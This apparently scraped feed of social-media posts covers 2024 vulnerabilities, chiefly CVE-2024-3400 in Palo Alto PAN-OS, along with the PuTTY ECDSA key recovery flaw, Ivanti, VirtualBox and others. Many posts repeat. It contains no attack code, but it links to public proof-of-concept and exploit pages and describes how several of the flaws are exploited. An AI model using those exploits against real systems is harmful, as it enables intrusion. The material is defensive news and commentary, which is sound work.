##Freshly updated list of very, very expensive toilet paper providers:
https://www.paloaltonetworks.com/legal-notices/trust-center/tech-certs
#PaloAlto #cve20243400 #CVE-2024-3400 #SecurityTheater
##Urgent: Product and Mitigation Guidance Updates for CVE-2024-3400
Palo Alto Networks has released urgent updates to product and mitigation guidance in the CVE-2024-3400 security advisory. Device telemetry does not need to be enabled on firewalls running an affected version of PAN-OS with GlobalProtect portal or GlobalProtect gateway enabled to be exposed to attacks related to this vulnerability.
Full details of the issue and the latest security advisory updates are available at https://security.paloaltonetworks.com/CVE-2024-3400. We strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when workarounds and mitigations have been applied.
Palo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties.
For indicators of compromise, please see the Unit 42 Threat Brief and Volexity blog post.
##Full Rapid7 technical analysis of Palo Alto Networks #cve20243400 via @stephenfewer and new vuln research teammate @fuzz 🤩 Spoiler: Two vulns, one exploit! https://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis
##I would like to thank the script kiddies using base64 encoded commands attempting to compromise #paloalto #CVE_2024_3400
It's a fun surprise when we decode the command found in the logs. Never know what we will get, hope it's exciting or entertaining.
##Freshly updated list of very, very expensive toilet paper providers:
https://www.paloaltonetworks.com/legal-notices/trust-center/tech-certs
#PaloAlto #cve20243400 #CVE-2024-3400 #SecurityTheater
##Urgent: Product and Mitigation Guidance Updates for CVE-2024-3400
Palo Alto Networks has released urgent updates to product and mitigation guidance in the CVE-2024-3400 security advisory. Device telemetry does not need to be enabled on firewalls running an affected version of PAN-OS with GlobalProtect portal or GlobalProtect gateway enabled to be exposed to attacks related to this vulnerability.
Full details of the issue and the latest security advisory updates are available at https://security.paloaltonetworks.com/CVE-2024-3400. We strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when workarounds and mitigations have been applied.
Palo Alto Networks is aware of an increasing number of attacks that leverage the exploitation of this vulnerability. Proof of concepts for this vulnerability have been publicly disclosed by third parties.
For indicators of compromise, please see the Unit 42 Threat Brief and Volexity blog post.
##Palo Alto firewalls: CVE-2024-3400 exploitation and PoCs for persistence after resets/upgrades https://www.helpnetsecurity.com/2024/04/30/palo-alto-firewalls-persistence-cve-2024-3400-exploitation/ #PaloAltoNetworks #Don'tmiss #Hotstuff #firewall #exploit #News #PoC
##Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##Another script for check or exploiting the CVE-2024-3400 (PAN-OS) vulnerability:
https://exploitalert.com/view-details/palo-alto-pan-os-command-execution-arbitrary-file-creation
##@arstechnica >Perimeter devices ought to prevent network hacks. Why are so many devices allowing attacks?
Because of shitty engineering and nobody giving a fuck about doing things right.
It just isn't more exciting than that. Sorry.
A great recent example is the shoddy Python in Palo Alto devices (CVE-2024-3400), and of course being run as root because why not:
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
Siemens revealed that its Ruggedcom APE1808 devices configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400. https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/
##The issue, tracked as CVE-2024-3400 (CVSS score of 10/10), is described as a command injection in the GlobalProtect feature of PAN-OS, the operating system running on Palo Alto Networks’ appliances. https://www.securityweek.com/thousands-of-palo-alto-firewalls-potentially-impacted-by-exploited-vulnerability/
##22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks
Approximately 22,500 exposed Palo Alto GlobalProtect firewall devices are likely vulnerable to the CVE-2024-3400 flaw, a critical command injection...
🔗️ [Bleepingcomputer] https://link.is.it/8l87v1
##Dear Palo Alto:
Karma's a bitch.
Sincerely,
CVE-2024-3400
You shouldnt name your thing PAN-OS because then people have to read the phrase "PAN-OS vulnerability" and now the only thing people know about your thing is that its vulnerable and the name is annoying
https://security.paloaltonetworks.com/CVE-2024-3400
Palo Firewall CVE Critical 10 best write up
https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/
Good haul this week, including #exploit modules for PAN-OS CVE-2024-3400, FortiClient CVE-2023-48788, and Apache Solr CVE-2023-50386. Some solid fixes and enhancements too! 🐚 https://www.rapid7.com/blog/post/2024/04/26/metasploit-weekly-wrap-up-04-26-24/
##Another script for check or exploiting the CVE-2024-3400 (PAN-OS) vulnerability:
https://exploitalert.com/view-details/palo-alto-pan-os-command-execution-arbitrary-file-creation
##@arstechnica >Perimeter devices ought to prevent network hacks. Why are so many devices allowing attacks?
Because of shitty engineering and nobody giving a fuck about doing things right.
It just isn't more exciting than that. Sorry.
A great recent example is the shoddy Python in Palo Alto devices (CVE-2024-3400), and of course being run as root because why not:
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
Siemens revealed that its Ruggedcom APE1808 devices configured with a Palo Alto Networks virtual next-generation firewall (NGFW) could be affected by CVE-2024-3400. https://www.securityweek.com/siemens-industrial-product-impacted-by-exploited-palo-alto-firewall-vulnerability/
##The issue, tracked as CVE-2024-3400 (CVSS score of 10/10), is described as a command injection in the GlobalProtect feature of PAN-OS, the operating system running on Palo Alto Networks’ appliances. https://www.securityweek.com/thousands-of-palo-alto-firewalls-potentially-impacted-by-exploited-vulnerability/
##22,500 Palo Alto firewalls "possibly vulnerable" to ongoing attacks
Approximately 22,500 exposed Palo Alto GlobalProtect firewall devices are likely vulnerable to the CVE-2024-3400 flaw, a critical command injection...
🔗️ [Bleepingcomputer] https://link.is.it/8l87v1
##Dear Palo Alto:
Karma's a bitch.
Sincerely,
CVE-2024-3400
You shouldnt name your thing PAN-OS because then people have to read the phrase "PAN-OS vulnerability" and now the only thing people know about your thing is that its vulnerable and the name is annoying
https://security.paloaltonetworks.com/CVE-2024-3400
📣 PSA for all ethical hackers: we've integrated detection for CVE-2024-3400, the OS Command Injection in Palo Alto GlobalProtect into our Network Vulnerability Scanner: https://pentest-tools.com/vulnerabilities-exploits/globalprotect-os-command-injection_22624
With a CVSSv3 score of 10 and a strong warning from the Cybersecurity and Infrastructure Security Agency (CISA), this vulnerability opens up vulnerable targets to remote unauthenticated attacks.
The bad actor can exploit this CVE fully compromise the server and steal confidential information, install ransomware, or pivot to the internal network.
Our Network Vulnerability Scanner provides detection for CVE-2024-3400 through our Nuclei integration, which reminds us why it's essential that we work together to tackle security issues which impact widely used infrastructure.
Stay safe (and sane), fellow hackers!
👉 Learn about CVE-2024-3400: https://pentest-tools.com/vulnerabilities-exploits/globalprotect-os-command-injection_22624
👉 Discover the 4 engines in our Network Scanner: https://www.youtube.com/watch?v=s8nsxDz8LlU
👉 Find out what our Network Scanner can do: https://pentest-tools.com/network-vulnerability-scanning/network-security-scanner-online
After security researchers posted proof-of-concept code for a recent zero-day in Palo Alto Networks GlobalProtect firewalls, the company says it's seeing "an increasing number of attacks" targeting its devices.
##FYI to all you clever Palo people who disabled telemetry to mitigate CVE-2024-3400:
##In earlier versions of this advisory, disabling device telemetry was listed as a secondary mitigation action. Disabling device telemetry is no longer an effective mitigation. Device telemetry does not need to be enabled for PAN-OS firewalls to be exposed to attacks related to this vulnerability.
@moloch @hdm @alizthehax0r you know, I am not too convinced this is even in gorilla/sessions.FilesystemStore?
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/ has it in a thing called SessDiskStore which calls paloaltonetworks_com_libs_common_Warn. Maybe they copy-pasted the unsafe code?
gorilla/sessions actually uses github.com/gorilla/securecookie to store the session ID in the cookie, not a plain SESSID.
##☕️ & #threatintel: as expected, Palo Alto's PAN-OS CVE-2024-3400 exploitation has transitioned to widespread and opportunistic.
Be sure to keep up with PA's advisory as it was updated on the last day.
https://viz.greynoise.io/tags/palo-alto-pan-os-cve-2024-3400-rce-attempt
##Tracked as CVE-2024-3400, this security flaw can let unauthenticated threat actors execute arbitrary code as root via command injection in low-complexity attacks on vulnerable PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 firewalls if the device telemetry and GlobalProtect (gateway or portal) feature are enabled. https://www.bleepingcomputer.com/news/security/exploit-released-for-palo-alto-pan-os-bug-used-in-attacks-patch-now/
##à propos des analyses de la vuln CVE-2024-3400 , j'aime bien l'image d'en-tête de celle de watchtowr.
:)
ça résume bien la situation actuelle de ces appliances de "protection" en ligne de front
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
##The watchTowr folks published an in-depth article today covering the Palo Alto Networks unauthenticated RCE at: https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
Even more impressive is they also disclosed a zero-day directory traversal vulnerability in the #golang gorilla/sessions package (used far and wide). The gorilla vulnerability only applies to code using the FilesystemStore, but it is still likely to impact a huge range of products and services. A pull request to fix this is open at https://github.com/gorilla/sessions/pull/274
Huge thanks to @alizthehax0r and the watchTowr team as well as @moloch of Bishop Fox for co-discovery (and providing a fix for) of the gorilla/sessions bug.
##In case you missed it, Palo Alto Networks updated their security advisory in terms of product and mitigation guidance, exploit status, and PAN-OS fix availability: 🔗 https://security.paloaltonetworks.com/CVE-2024-3400
#CVE_2024_3400 #PaloAltoNetworks #zeroday #activeexploitation #eitw #kev #KnownExploitedVulnerabilitiesCatalog #vulnerability #ProofofConcept
##Ahhhhhhhhh, I think this is it. Looks like it probably was a vuln in Gorilla/sessions, but the commit didn't flag it as a security change (actually bundled a lot of changes together).
So July, 2023 the code was updated to sanitize file path before opening (when trying to open a file matching the name of what was sent in the cookie).
I wonder how many other places are using Gorilla/sessions and didn't realize this was a security fix, so they haven't updated and are thus vulnerable.
Granted, it seems like the only impact would be ability to write a zero-byte file to arbitrary place on the filesystem (that the process has access to), but as we have seen with CVE-2024-3400 that is can be useful.
##According to this greynoise tag its already started https://viz.greynoise.io/tags/palo-alto-pan-os-cve-2024-3400-rce-attempt?days=1
##@watchtowrcyber did it again! #paloalto CVE-2024-3400 now has a very good technical writeup, and will soon be exploited in the wild. this is a valid POC.
https://labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/
##updated 2024-04-23T18:30:39
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-23T18:30:39
2 posts
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
Microsoft Security Response Center (MSRC) also dropped 14 security advisories because these "vulnerability assigned to this CVE is in Chromium Open Source Software (OSS) which is consumed by Microsoft Edge (Chromium-based). It is being documented in the Security Update Guide to announce that the latest version of Microsoft Edge (Chromium-based) is no longer vulnerable." Click on this reply to see the original toot about Google Chrome's security advisory blog post. No mention of exploitation, no CVSSv3 scores provided.
updated 2024-04-23T15:30:35
1 posts
Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:
#CVE_2024_28073 #CVE_2024_29001 #CVE_2024_29003 #SolarWinds #PatchTuesday #vulnerability
##updated 2024-04-20T00:31:58
8 posts
CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:
cc: @reverseics
##CISA Industrial Control System security advisory includes a familiar product: Unitronics Vision Standard PLCs allow a remote, unauthenticated individual to retrieve the 'Information Mode' password in plaintext. This vulnerability is tracked as CVE-2024-1480 (7.5 high) and was reported by @reverseics of Dragos. 🔗 https://www.cisa.gov/news-events/ics-advisories/icsa-24-109-01
##Unitronics has not responded to requests to work with CISA to mitigate this vulnerability.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:
cc: @reverseics
##CISA Industrial Control System security advisory includes a familiar product: Unitronics Vision Standard PLCs allow a remote, unauthenticated individual to retrieve the 'Information Mode' password in plaintext. This vulnerability is tracked as CVE-2024-1480 (7.5 high) and was reported by @reverseics of Dragos. 🔗 https://www.cisa.gov/news-events/ics-advisories/icsa-24-109-01
##Unitronics has not responded to requests to work with CISA to mitigate this vulnerability.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:
cc: @reverseics
##CISA Industrial Control System security advisory includes a familiar product: Unitronics Vision Standard PLCs allow a remote, unauthenticated individual to retrieve the 'Information Mode' password in plaintext. This vulnerability is tracked as CVE-2024-1480 (7.5 high) and was reported by @reverseics of Dragos. 🔗 https://www.cisa.gov/news-events/ics-advisories/icsa-24-109-01
##Unitronics has not responded to requests to work with CISA to mitigate this vulnerability.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
CISA ICS Advisory: Unitronics Vision Legacy Series (Update A)
Unitronics finally responded to CISA and provided recommendations:
cc: @reverseics
##CISA Industrial Control System security advisory includes a familiar product: Unitronics Vision Standard PLCs allow a remote, unauthenticated individual to retrieve the 'Information Mode' password in plaintext. This vulnerability is tracked as CVE-2024-1480 (7.5 high) and was reported by @reverseics of Dragos. 🔗 https://www.cisa.gov/news-events/ics-advisories/icsa-24-109-01
##Unitronics has not responded to requests to work with CISA to mitigate this vulnerability.
No known public exploitation specifically targeting these vulnerabilities has been reported to CISA at this time.
updated 2024-04-19T18:31:16
4 posts
New Microsoft Security Response Center (MSRC) security advisory for Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability CVE-2024-29991 (5.0 medium). A lot of information is revealed: attack complexity=high, and MSRC says that it would need to be used in an exploit chain for an attack. An attacker must send the user a malicious file and convince them to open it. 🔗 https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-29991
##A very normal morning in the world of Microsoft security.
1. Microsoft Defender Vulnerability Management tells me there's a new CVE for Edge.
2. It says 'score Unknown', the description is "This vulnerability affects the following vendors: Microsoft. To view more details about this vulnerability please visit the vendor website".
3. Search for CVE-2024-29991, search result includes https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29991, visit page, 404 page not found.
This is all fine.
New Microsoft Security Response Center (MSRC) security advisory for Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability CVE-2024-29991 (5.0 medium). A lot of information is revealed: attack complexity=high, and MSRC says that it would need to be used in an exploit chain for an attack. An attacker must send the user a malicious file and convince them to open it. 🔗 https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-29991
##A very normal morning in the world of Microsoft security.
1. Microsoft Defender Vulnerability Management tells me there's a new CVE for Edge.
2. It says 'score Unknown', the description is "This vulnerability affects the following vendors: Microsoft. To view more details about this vulnerability please visit the vendor website".
3. Search for CVE-2024-29991, search result includes https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-29991, visit page, 404 page not found.
This is all fine.
updated 2024-04-19T13:10:25.637000
5 posts
Tenable has published additional details about CVE-2024-29204 (9.8 critical, disclosed 16 April 2024 by Ivanti) and how it can be exploited by sending messages to Avalanche’s WLAvalancheService.exe on TCP port 1777. This includes a Proof of Concept. 🔗 https://www.tenable.com/security/research/tra-2024-10
##I bet #Ivanti is compliant to ISO9001 which is delivering a constant stream of high quality vulnerabilities. One is an unauthenticated RCE and another one is a DoS where you can delete remote files.
https://vulnerability.circl.lu/vuln/CVE-2024-29204
##Ivanti patches critical Avalanche flaw exploitable via a simple message (CVE-2024-29204) https://www.helpnetsecurity.com/2024/04/18/cve-2024-29204/ #remotemanagement #vulnerability #Don'tmiss #Hotstuff #Tenable #Ivanti #News #CVE
##Tenable has published additional details about CVE-2024-29204 (9.8 critical, disclosed 16 April 2024 by Ivanti) and how it can be exploited by sending messages to Avalanche’s WLAvalancheService.exe on TCP port 1777. This includes a Proof of Concept. 🔗 https://www.tenable.com/security/research/tra-2024-10
##I bet #Ivanti is compliant to ISO9001 which is delivering a constant stream of high quality vulnerabilities. One is an unauthenticated RCE and another one is a DoS where you can delete remote files.
https://vulnerability.circl.lu/vuln/CVE-2024-29204
##updated 2024-04-19T13:10:25.637000
2 posts
I bet #Ivanti is compliant to ISO9001 which is delivering a constant stream of high quality vulnerabilities. One is an unauthenticated RCE and another one is a DoS where you can delete remote files.
https://vulnerability.circl.lu/vuln/CVE-2024-29204
##I bet #Ivanti is compliant to ISO9001 which is delivering a constant stream of high quality vulnerabilities. One is an unauthenticated RCE and another one is a DoS where you can delete remote files.
https://vulnerability.circl.lu/vuln/CVE-2024-29204
##updated 2024-04-18T18:25:55.267000
2 posts
Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability
##Tanto Security: Judge0 Sandbox Escape
Judge0 is an open source service used to run arbitrary code inside a secure sandbox. Tanto Security disclosed vulnerabilities (including proofs of concept and exploit scripts) in Judge0 that allows an adversary with sufficient access to perform a sandbox escape and obtain root permissions on the host machine. h/t @buherator
#CVE_2024_29021 #CVE_2024_28185 #CVE_2024_28189 #CVE_2024_28185 #Judge0 #proofofconcept #vulnerability
##updated 2024-04-18T09:30:53
1 posts
Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:
#CVE_2024_28073 #CVE_2024_29001 #CVE_2024_29003 #SolarWinds #PatchTuesday #vulnerability
##updated 2024-04-17T18:31:37
1 posts
Three SolarWinds security advisories from 17 April 2024. No mention of exploitation:
#CVE_2024_28073 #CVE_2024_29001 #CVE_2024_29003 #SolarWinds #PatchTuesday #vulnerability
##updated 2024-04-17T12:48:07.510000
2 posts
updated 2024-04-17T12:48:07.510000
4 posts
1 repos
CVE-2024-21111 – Local Privilege Escalation in Oracle VirtualBox https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/
##Oracle VirtualBox LPE PoC: https://github.com/mansk1es/CVE-2024-21111
##CVE-2024-21111 – Local Privilege Escalation in Oracle VirtualBox https://www.mdsec.co.uk/2024/04/cve-2024-21111-local-privilege-escalation-in-oracle-virtualbox/
##Oracle VirtualBox LPE PoC: https://github.com/mansk1es/CVE-2024-21111
##updated 2024-04-17T00:31:29
11 posts
2 repos
JVNVU#91264077: PuTTY SSHクライアントのECDSA署名処理に脆弱性 https://jvn.jp/vu/JVNVU91264077/ 2024/04/18公開
「NIST P521楕円曲線によるECDSA秘密鍵を使っている場合、署名を行う際に生成するnonceに偏り...(CVE-2024-31497...)...60個程度の署名データから、使用している秘密鍵を特定される可能性」
##Thanks to @gsuberland for this write up on CVE-2024-31497. Made for a fun discussion today.
##My thoughts on this are being driven by recent experiences RE CVE-2024-31497 on workstations and servers, but I want to listen to the folks who do this for a living before I start talking too much.
##Wer es noch nicht gesehen hat:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31497
Wer #Putty < 0.81 nutzt, sollte updaten (auch wenn es "nur" einen Algo betrifft):
##Thanks to @gsuberland for this write up on CVE-2024-31497. Made for a fun discussion today.
##My thoughts on this are being driven by recent experiences RE CVE-2024-31497 on workstations and servers, but I want to listen to the folks who do this for a living before I start talking too much.
##Wer es noch nicht gesehen hat:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31497
Wer #Putty < 0.81 nutzt, sollte updaten (auch wenn es "nur" einen Algo betrifft):
###PuTTY #SSH client flaw allows recovery of #cryptographic #private keys
> A vulnerability tracked as CVE-2024-31497 in PuTTY 0.68 through 0.80 could potentially allow attackers with access to 60 cryptographic signatures to recover the private key used for their generation.
##Urgent: PuTTY 0.81, released on 4/15/2024, fixes a critical vulnerability CVE-2024-31497 in the use of 521-bit ECDSA keys (ecdsa-sha2-nistp521). If you have used a 521-bit ECDSA private key with any previous version of PuTTY, consider the private key compromised: remove the public key from authorized_keys files, and generate a new key pair.
Should update FileZilla and other software, too, for same reason. #MastoAdmin
https://www.chiark.greenend.org.uk/~sgtatham/putty/
CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-31497
###PuTTY #SSH client flaw allows recovery of #cryptographic #privatekeys
The vulnerability (CVE-2024-31497) was discovered by Fabian Bäumer and Marcus Brinkmann of the Ruhr University Bochum and is caused by how PuTTY generates #ECDSA nonces (temporary unique cryptographic numbers) for the NIST P-521 curve used for SSH authentication. The main repercussion of recovering the private key is that it allows unauthorized access to SSH servers or sign commits as the developer.
https://www.bleepingcomputer.com/news/security/putty-ssh-client-flaw-allows-recovery-of-cryptographic-private-keys/
Cette faille dans #PuTTY permet de récupérer les clés privées https://www.it-connect.fr/faille-de-securite-client-ssh-putty-permet-de-recuperer-les-cles-privees-cve-2024-31497/
##updated 2024-04-12T03:30:44
2 posts
SonicWall: GitLab XSS Via Autocomplete Results
SonicWall provided vulnerability details for a cross-site scripting (XSS) vulnerability in GitLab, tracked as CVE-2024-2279 (8.7 high severity). "This vulnerability arises due to a flaw in the input validation mechanism while displaying suggestions to the user using the feature called ‘autocomplete for issues reference’ in the rich text editor."
SonicWall: GitLab XSS Via Autocomplete Results
SonicWall provided vulnerability details for a cross-site scripting (XSS) vulnerability in GitLab, tracked as CVE-2024-2279 (8.7 high severity). "This vulnerability arises due to a flaw in the input validation mechanism while displaying suggestions to the user using the feature called ‘autocomplete for issues reference’ in the rich text editor."
updated 2024-04-11T21:30:45
2 posts
3 repos
https://github.com/UMU618/CVE-2024-21338
Avast previously reported that North Korean APT Lazarus Group exploited the Windows kernel driver vulnerability CVE-2024-21338 as a zero-day. This blog post expands on that reporting, revealing that the Lazarus group targeted individuals through fabricated job offers and employed a sophisticated toolset to achieve better persistence while bypassing security products. Avast was able to uncover almost the entire attack chain. They also found a previously undocumented Kaolin RAT, where it could aside from standard RAT functionality, change the last write timestamp of a selected file and load any received DLL binary from the C2 server. IOC provided.🔗 https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/
#threatintel #DFIR #IOC #NorthKorea #cyberespionage #Lazarus #APT #CVE_2024_21338 #KaolinRAT
##Avast previously reported that North Korean APT Lazarus Group exploited the Windows kernel driver vulnerability CVE-2024-21338 as a zero-day. This blog post expands on that reporting, revealing that the Lazarus group targeted individuals through fabricated job offers and employed a sophisticated toolset to achieve better persistence while bypassing security products. Avast was able to uncover almost the entire attack chain. They also found a previously undocumented Kaolin RAT, where it could aside from standard RAT functionality, change the last write timestamp of a selected file and load any received DLL binary from the C2 server. IOC provided.🔗 https://decoded.avast.io/luiginocamastra/from-byovd-to-a-0-day-unveiling-advanced-exploits-in-cyber-recruiting-scams/
#threatintel #DFIR #IOC #NorthKorea #cyberespionage #Lazarus #APT #CVE_2024_21338 #KaolinRAT
##updated 2024-04-11T21:30:44
3 posts
Trend Micro researchers provide a vulnerability analysis on CVE-2024-20697 (7.3 high, disclosed 09 January 2024 by Microsoft) Windows Libarchive Remote Code Execution Vulnerability. 🔗 https://www.zerodayinitiative.com/blog/2024/4/17/cve-2024-20697-windows-libarchive-remote-code-execution-vulnerability
##An integer overflow vulnerability exists in the Libarchive library included in Microsoft Windows. The vulnerability is due to insufficient bounds checks on the block length of a RARVM filter used for Intel E8 preprocessing, included in the compressed data of a RAR archive.
A remote attacker could exploit this vulnerability by enticing a target user into extracting a crafted RAR archive. Successful exploitation could result in arbitrary code execution in the context of the application using the vulnerable library.
You need to run a VM. To unpack RAR files. What the hell. 😂
##CVE-2024-20697: Windows Libarchive Remote Code Execution Vulnerability -- The Trend Micro Research Team takes a deep dive into this recently patch bug. An attacker could exploit this bug by enticing a user into extracting a crafted RAR archive. Read all the details at https://www.zerodayinitiative.com/blog/2024/4/17/cve-2024-20697-windows-libarchive-remote-code-execution-vulnerability
##updated 2024-04-11T21:06:16
2 posts
1 repos
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##Cactus Ransomware Exploits Qlik Vulnerabilities for Initial Access Mega Toot
This was reported last year by Arctic Wolf as Cactus Ransomware was actively exploiting Qlik Sense servers for initial access. The vulnerabilities are as follows:
Project Melissa, a public-private partnership against ransomware, identified 3100 vulnerable servers worldwide and notified their organizations. 122 of these servers were actively being exploited.
#Cactus #ransomware #CVE_2023_41266 #CVE_2023_41265 #CVE_2023_48365 #Qlik #vulnerability #threatintel
##updated 2024-04-11T20:15:35.127000
2 posts
Microsoft Security Response Center (MSRC) ominously updated CVE-2024-26198 (8.8 high, disclosed 12 March 2024) which is a Microsoft Exchange Server Remote Code Execution Vulnerability. FYI, not exploited, not publicly disclosed, exploitation is less likely. 🔗 https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-26198
Microsoft is announcing the release of a new version of the Microsoft Exchange Server updates to address all known issues that were identified in the March 2024 Security Updates. Microsoft strongly recommends installing these new updates to address the vulnerability identified by CVE-2024-26198.
I did a quick search of their 2024 March Release Notes and CVE-2024-26198 is the only Exchange vulnerability.
#CVE_2024_26198 #Microsoft #MSRC #vulnerability #PatchTuesday
##Microsoft Security Response Center (MSRC) ominously updated CVE-2024-26198 (8.8 high, disclosed 12 March 2024) which is a Microsoft Exchange Server Remote Code Execution Vulnerability. FYI, not exploited, not publicly disclosed, exploitation is less likely. 🔗 https://msrc.microsoft.com/update-guide/en-US/advisory/CVE-2024-26198
Microsoft is announcing the release of a new version of the Microsoft Exchange Server updates to address all known issues that were identified in the March 2024 Security Updates. Microsoft strongly recommends installing these new updates to address the vulnerability identified by CVE-2024-26198.
I did a quick search of their 2024 March Release Notes and CVE-2024-26198 is the only Exchange vulnerability.
#CVE_2024_26198 #Microsoft #MSRC #vulnerability #PatchTuesday
##updated 2024-04-10T13:24:00.070000
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-10T13:24:00.070000
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-10T13:24:00.070000
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-10T13:24:00.070000
2 posts
Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##Apr 18, 2024 Corrected Cumulative Update version numbers and reference KB numbers in the FAQ: "There are GDR and/or CU (Cumulative Update) updates offered for my version of SQL Server. How do I know which update to use?" These are informational changes only.
It appears all of them were published on 09 April 2024 and this is an informational change. Not exploited, not publicly disclosed and exploitation less likely.
##updated 2024-04-10T13:24:00.070000
2 posts
